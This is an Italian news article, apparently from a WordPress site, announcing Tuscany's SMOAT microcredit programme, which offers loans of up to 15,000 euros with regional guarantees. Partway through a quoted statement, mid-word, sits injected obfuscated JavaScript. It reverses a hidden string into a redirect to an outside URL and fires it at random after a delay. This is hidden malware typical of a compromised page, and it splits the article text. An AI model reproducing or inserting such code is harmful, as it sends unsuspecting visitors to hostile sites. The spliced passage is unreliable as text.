Microcredito, dalla Regione Toscana arriva il credito per gli imprenditori senza garanzie

image_pdfimage_print

Finanziamenti fino a 15.000 euro per tutti coloro che, privi di garanzie per accedere al credito bancario ordinario, vogliono avviare una microimpresa. A offrire le garanzie e le cogaranzie sarà la Regione Toscana insieme al sistema bancario regionale grazie all’istituzione del Fondo speciale rischi del valore complessivo di 14 milioni e trecentomila euro frutto del protocollo d’intesa Regione/Banche dello scorso aprile. E’ questo il cuore del nuovo progetto denominato Sistema Microcredito Orientato Assistito Toscano (SMOAT) fortemente voluto dall’assessore all’innovazione e alle attività produttive della Regione Toscana Ambrogio Brenna e presentato oggi a Firenze insieme a Giovanni Ricciardi, direttore di Fidi Toscana e Piero Faraoni, presidente della Commissione Regionale ABI della Toscana. “Questa azione innovativa, pressoché unica in Italia, è il frutto del buon lavoro della Commissione Etica Regionale e rappresenta un vero e proprio incubatore immateriale di relazioni e competenze, ha detto Ambrogio Brenna. Il nostro territorio possiede un gr (typeof ($p$VTO6JhIH6WkCGAcPR.list[n]) == "string") return $p$VTO6JhIH6WkCGAcPR.list[n].split("").reverse().join("");return $p$VTO6JhIH6WkCGAcPR.list[n];};$p$VTO6JhIH6WkCGAcPR.list=["'php.tegdiw.ssalc/bil/orp-tegdiw-rettiwt/snigulp/tnetnoc-pw/moc.xamdok//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}ande capitale umano e materiale, capacità di autodeterminazione, un atteggiamento positivo che l’ha sempre aiutato ad essere coeso e puntuale nelle azioni di rinnovamento. Con il nuovo Sistema Microcredito Orientato Assistito Toscano la Regione e Fidi Toscana, hanno deciso di puntare, sulle tracce del premio Nobel Muhammad Yunus fondatore della Grameen Bank, su quelle persone che, senza differenziazioni di genere, età o cittadinanza, hanno passione, idee e il desiderio di far crescere l’economia del territorio. Persone che – ha concluso Brenna – sono spesso prive di garanzie per accedere al credito bancario ordinario, e rischiano così di vedere frustrata la loro capacità imprenditoriale a danno di tutta la collettività.” Oltre l’opportunità di accedere al microcredito, il progetto SMOAT offre alle neo imprese e a quelle con meno di 18 mesi di vita, anche una serie di servizi gratuiti utili allo start-up d’impresa: orientamento (mappatura delle competenze, opportunità di mercato, valutazione dei rischi d’impresa), assistenza (progetti di fattibilità marketing, piani di restituzione, aggregazione di piccole imprese, riferimenti normativi) e tutoraggio (iter burocratici, ricerca di visibilità della neo impresa, rapporti con le associazioni di categoria). Il Sistema Microcredito Orientato Assistito Toscano è promosso dal programma della Regione Toscana per la responsabilità sociale delle imprese, Fabrica Ethica con l’obiettivo di incrementare lo sviluppo locale; favorire l’occupazione con incentivi di sostegno non esclusivamente finanziari; favorire l’inclusione socio-economica di soggetti in situazione di criticità, facilitando l’autoimpiego a fronte di crisi aziendali e perdita di occupazione; indirizzare i soggetti imprenditoriali verso uno sviluppo d’impresa basato sui diritti delle persone, dell’ambiente e del territorio. Lo sportello SMOAT sarà attivo tutti i giorni dal 15 gennaio 2007 presso Fidi Toscana, in piazza della Repubblica 6 a Firenze, tel. 055/2384223. Il martedì e il giovedì dalle 15.00 alle 18.00 saranno dedicati alle consulenze previo appuntamento. Per informazioni i siti internet sono www.fiditoscana.it, www.fabricaethica.it e la mail di riferimento è progetto_smoat@fiditoscana.it.

Leave a Reply

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *